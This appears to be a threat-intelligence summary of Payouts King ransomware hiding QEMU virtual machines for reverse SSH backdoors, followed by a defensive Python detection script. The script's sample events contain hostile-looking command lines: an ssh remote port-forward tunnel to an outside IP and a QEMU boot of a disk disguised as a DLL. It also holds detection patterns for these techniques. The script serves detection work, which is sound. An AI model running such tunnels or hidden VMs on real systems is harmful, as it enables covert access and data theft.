SolarWinds, SonicWall and Cisco: Payouts King ransomware uses QEMU VMs to bypass endpoint security

Payouts King Ransomware Abuses QEMU for Stealthy Attacks

The Payouts King ransomware operation is leveraging the QEMU emulator to deploy hidden virtual machines (VMs) on compromised systems, using them as a reverse SSH backdoor that evades endpoint security detection. QEMU, an open-source virtualization tool, allows attackers to execute malicious payloads, store files, and establish covert remote access, tactics previously observed in campaigns by 3AM ransomware, LoudMiner, and CRON#TRAP.

Two Active Campaigns

Cybersecurity firm Sophos identified two distinct campaigns exploiting QEMU:

  1. STAC4713 (Payouts King)

    • First observed in November 2025, linked to the GOLD ENCOUNTER threat group.
    • Initial access via exposed SonicWall VPNs and later through SolarWinds Web Help Desk (CVE-2025-26399).
    • More recent attacks used Cisco SSL VPN exploits and Microsoft Teams phishing, tricking employees into installing Quick Assist.
    • Attackers deploy a hidden Alpine Linux VM (v3.22.0) via a scheduled task (TPMProfiler), disguising virtual disks as databases or DLLs.
    • Tools inside the VM include AdaptixC2, Chisel, BusyBox, and Rclone, with reverse SSH tunnels for persistence.
    • Post-infection, they exfiltrate NTDS.dit, SAM, and SYSTEM hives via SMB and Rclone to remote SFTP servers.
  2. STAC3725 (CitrixBleed 2 Exploitation)

    • Active since February 2025, targeting NetScaler ADC/Gateway (CVE-2025-5777).
    • After compromise, attackers deploy a ZIP archive containing a malicious executable that:
      • Installs a service (AppMgmt).
      • Creates a local admin user (CtxAppVCOMService).
      • Deploys ScreenConnect for persistence.
    • A QEMU-based Alpine Linux VM is then launched, where attackers manually install tools like Impacket, KrbRelayx, BloodHound.py, and Metasploit for credential harvesting, AD reconnaissance, and data exfiltration via FTP.

Ransomware Tactics & Attribution

Payouts King employs AES-256 (CTR) + RSA-4096 encryption, intermittent file encryption, and anti-analysis techniques. Ransom notes direct victims to dark web leak sites. Zscaler suggests ties to former BlackBasta affiliates, citing similar initial access methods (e.g., spam bombing, Teams phishing, Quick Assist abuse).

The group also terminates security tools via low-level system calls and establishes persistence through scheduled tasks. Organizations are advised to monitor for unauthorized QEMU installations, suspicious SYSTEM-level tasks, and unusual SSH port forwarding.
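The three monitoring recommendations above (unauthorized QEMU installations, suspicious SYSTEM-level scheduled tasks, unusual SSH port forwarding) can be turned into a simple triage pass over endpoint telemetry. The script below is an added example written for this summary; it is not code from the article, Sophos or Zscaler. The event records and their field names are constructed sample data, not a vendor schema, and the list of "disguise" file extensions is an assumption based on the article's note that virtual disks were disguised as databases or DLLs. The QEMU options (`-hda`, `-drive file=`) and the `ssh -R` remote-forwarding flag are real upstream options.

```python
"""
Added example (not from the article, Sophos or Zscaler): triage Windows
process-creation and scheduled-task events for the three indicators the
article recommends monitoring. All sample records below are constructed.
"""
import re
import shlex

# Upstream QEMU system-emulator binaries are named qemu-system-<arch>[.exe].
QEMU_IMAGE_RE = re.compile(r"(^|[\\/])qemu-system-[\w-]+(\.exe)?$", re.IGNORECASE)

# OpenSSH client binary (ssh or ssh.exe at the end of the image path).
SSH_IMAGE_RE = re.compile(r"(^|[\\/])ssh(\.exe)?$", re.IGNORECASE)

# Extensions a VM disk image would not normally carry; the article reports
# disks disguised as databases or DLLs. This exact list is an assumption.
DISGUISE_EXTS = {".dll", ".db", ".mdf", ".sqlite", ".dat"}

# Real QEMU options that take a disk-image path as the next argument.
DISK_OPTS = {"-hda", "-hdb", "-hdc", "-hdd", "-cdrom"}

# Scheduled-task name reported by the article for STAC4713.
KNOWN_TASK_NAMES = {"TPMProfiler"}

SYSTEM_ACCOUNTS = {"SYSTEM", "NT AUTHORITY\\SYSTEM"}


def qemu_disk_paths(cmdline):
    """Return every path a QEMU command line passes as a disk image."""
    try:
        # posix=False keeps Windows backslashes and quoted tokens intact.
        argv = shlex.split(cmdline, posix=False)
    except ValueError:
        return []
    paths = []
    for i, tok in enumerate(argv):
        if i + 1 >= len(argv):
            break
        nxt = argv[i + 1].strip('"')
        if tok in DISK_OPTS:
            paths.append(nxt)
        elif tok == "-drive":
            # -drive file=<path>,format=<fmt>,... ; pull out the file= field.
            for kv in nxt.split(","):
                if kv.startswith("file="):
                    paths.append(kv[len("file="):])
    return paths


def disguised_disks(paths):
    """Keep only disk paths whose extension looks like a database or DLL."""
    return [p for p in paths if any(p.lower().endswith(e) for e in DISGUISE_EXTS)]


def is_reverse_ssh(image, cmdline):
    """Heuristic: ssh client started with remote (-R) port forwarding."""
    if not SSH_IMAGE_RE.search(image):
        return False
    # Matches "-R", "-R2222:...", and bundled flags such as "-fNR".
    return re.search(r"(^|\s)-\w*R", cmdline) is not None


def triage(record):
    """Return alert strings for one event record (empty list if clean)."""
    alerts = []
    image = record.get("image", "")
    cmdline = record.get("cmdline", "")
    if record.get("event") == "process_create":
        if QEMU_IMAGE_RE.search(image):
            alerts.append("qemu-binary: QEMU emulator launched")
            for path in disguised_disks(qemu_disk_paths(cmdline)):
                alerts.append(f"qemu-disguised-disk: {path}")
        if is_reverse_ssh(image, cmdline):
            alerts.append("reverse-ssh: ssh started with remote port forwarding")
    elif record.get("event") == "task_register":
        name = record.get("task_name", "")
        if name in KNOWN_TASK_NAMES:
            alerts.append(f"known-task-name: {name}")
        runs_as_system = record.get("run_as", "").upper() in SYSTEM_ACCOUNTS
        if runs_as_system and QEMU_IMAGE_RE.search(record.get("action", "")):
            alerts.append(f"system-task-runs-qemu: {name}")
    return alerts


def scan(records):
    """Map record index -> alerts for every record that raised at least one."""
    hits = {}
    for i, rec in enumerate(records):
        alerts = triage(rec)
        if alerts:
            hits[i] = alerts
    return hits


# Constructed sample events (not real telemetry); 203.0.113.0/24 is a
# documentation range.
SAMPLE_EVENTS = [
    {"event": "process_create", "image": r"C:\ProgramData\TPM\qemu-system-x86_64.exe",
     "cmdline": r'qemu-system-x86_64.exe -m 2048 -hda "C:\ProgramData\TPM\tpmcache.dll" -nographic'},
    {"event": "task_register", "task_name": "TPMProfiler", "run_as": "SYSTEM",
     "action": r"C:\ProgramData\TPM\qemu-system-x86_64.exe"},
    {"event": "process_create", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -N -R 2222:127.0.0.1:22 user@203.0.113.10"},
    {"event": "process_create", "image": r"C:\Program Files\qemu\qemu-system-x86_64.exe",
     "cmdline": r"qemu-system-x86_64.exe -drive file=C:\VMs\lab.qcow2,format=qcow2"},
    {"event": "process_create", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for idx, alerts in scan(SAMPLE_EVENTS).items():
        print(idx, alerts)
```

The fourth sample record shows the intended noise level: a legitimately installed QEMU with a normal `.qcow2` disk still raises the generic "QEMU launched" alert (the article's first recommendation is to look for any unauthorized installation), but not the disguised-disk one, so an analyst can whitelist known lab hosts while keeping the stronger indicators.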

Source: https://www.bleepingcomputer.com/news/security/payouts-king-ransomware-uses-qemu-vms-to-bypass-endpoint-security/

SolarWinds cybersecurity rating report: https://www.rankiteo.com/company/solarwinds

SonicWall cybersecurity rating report: https://www.rankiteo.com/company/sonicwall

Cisco cybersecurity rating report: https://www.rankiteo.com/company/cisco
